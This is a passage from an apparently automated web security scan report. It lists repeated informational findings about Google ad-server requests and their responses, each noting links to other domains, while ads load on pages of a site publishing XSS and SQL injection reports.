<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dgoogle.com/nonprofits%26adT%3DGoogle%2Bfor%2BNonprofits%26adU%3Dwww.lynda.com%26adT%3DJavascript%2BTutorials%26adU%3Dwww.1stdirect.com%26adT%3DWin%2BSales%2Bwith%2BGoldMine%26gl%3DUS&amp;usg=AFQjCNEMrJVlHYETIoHrClYLXs_sMQQWtg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303766390&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-dork-ghdb-example-poc-report-integritydefendercom.html&dt=1303748390428&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303748390472&frm=0&adk=1607234649&ga_vid=1176146025.1303748391&ga_sid=1303748391&ga_hid=1841069353&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=150&xpc=0gn202LYa3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 16:19:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4339

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-dork-ghdb-example-poc-report-integritydefendercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNE2Ej5fayPFBl3bdGKOxW9tfp4z_Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303763065&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fxss-sqlinjection-httpinjection-ghdb-weak-configuration-vulnerable-hosts.html&dt=1303745087253&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303745090500&frm=0&adk=1607234649&ga_vid=742782134.1303745091&ga_sid=1303745091&ga_hid=1760116317&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=4874&xpc=BT5BNSRwaN&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 15:24:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12682

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/xss-sqlinjection-httpinjection-ghdb-weak-configuration-vulnerable-hosts.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DCymphonix.com/Web%252BApplication%252BSecurity%26adT%3DWeb%2BApplication%2BSecurity%26gl%3DUS&amp;usg=AFQjCNFzbS8b_q8Gy02vmrSC-B7vhehK9g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.21. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758225&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740262586&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740262682&frm=0&adk=1819763764&ga_vid=304831063.1303740263&ga_sid=1303740263&ga_hid=199340974&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=169&xpc=ZRywAON1Xo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPrenupAgreement.RocketLawyer.com%26adT%3DFree%2BPrenuptial%2BAgreement%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNEtEtdonxR2g6hFKmGbMydw4xcj3g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.22. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790872&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303772872555&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303772872702&frm=0&adk=1819763764&ga_vid=624800800.1303772873&ga_sid=1303772873&ga_hid=1342685636&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=965&fu=0&ifi=1&dtd=250&xpc=rD6TaJqUy8&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:07:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4466

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFRYxazEn78bQ_SpZW_gi9TptIt1w" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.23. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303763550&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Facu-test%2Fsql-injection%2Freflected-xss-padding-oracle-exploit-poet-ghdb-example-poc-report.html&dt=1303745550295&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303745550333&frm=0&adk=1607234649&ga_vid=1470949587.1303745550&ga_sid=1303745550&ga_hid=1797870046&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=103&xpc=zmAJ8LDFB9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 15:32:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/Users/crawler/Documents/acu-test/sql-injection/reflected-xss-padding-oracle-exploit-poet-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26gl%3DUS&amp;usg=AFQjCNHtX1a4QWcYiRUOaJy2P8h6LB9fIw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303759971&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html&dt=1303742686562&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303742686588&frm=0&adk=1607234649&ga_vid=1444597712.1303742687&ga_sid=1303742687&ga_hid=874676743&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&eid=33895132&fu=0&ifi=1&dtd=60&xpc=dQOO6ofOJ6&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12782

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.DailyTradeAlert.com%26adT%3D9%2BBest%2BStocks%2Bto%2BOwn%2BNow%26adU%3Dwww.obs-innovation.com%26adT%3DFree%2BDocument%2BWhite%2BPaper%26gl%3DUS&amp;usg=AFQjCNHr3R-N75W0VvPU4CVjLvuDguH5Hg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790964&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303773969586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303773969593&frm=0&adk=1819763764&ga_vid=1041358032.1303773970&ga_sid=1303773970&ga_hid=44812681&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1208&bih=981&fu=0&ifi=1&dtd=11&xpc=wH1YPlIFCx&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:25:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/sql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.lynda.com%26adT%3DJavascript%2BTutorials%26adU%3Dsupermicro.com/StorageComputer%26adT%3D2.5%2526quot%253B%2BHDD%2BServer%2B%2526amp%253B%2BChassis%26adU%3Ddice.com/Telefonix%26adT%3DMechanical%2BEngineer%26gl%3DUS&amp;usg=AFQjCNGmvLd4OMh39nK0zSDbgCmnhdCB8w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4436

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHCmAmNDJ1ozxP3Mf5vXQDJFH30_g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303788500&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm&dt=1303770568690&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303770568721&frm=0&adk=1819763764&ga_vid=1349415426.1303770570&ga_sid=1303770570&ga_hid=1025229167&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1208&bih=981&eid=33895130&fu=0&ifi=1&dtd=1168&xpc=ZZmeB2DSTu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
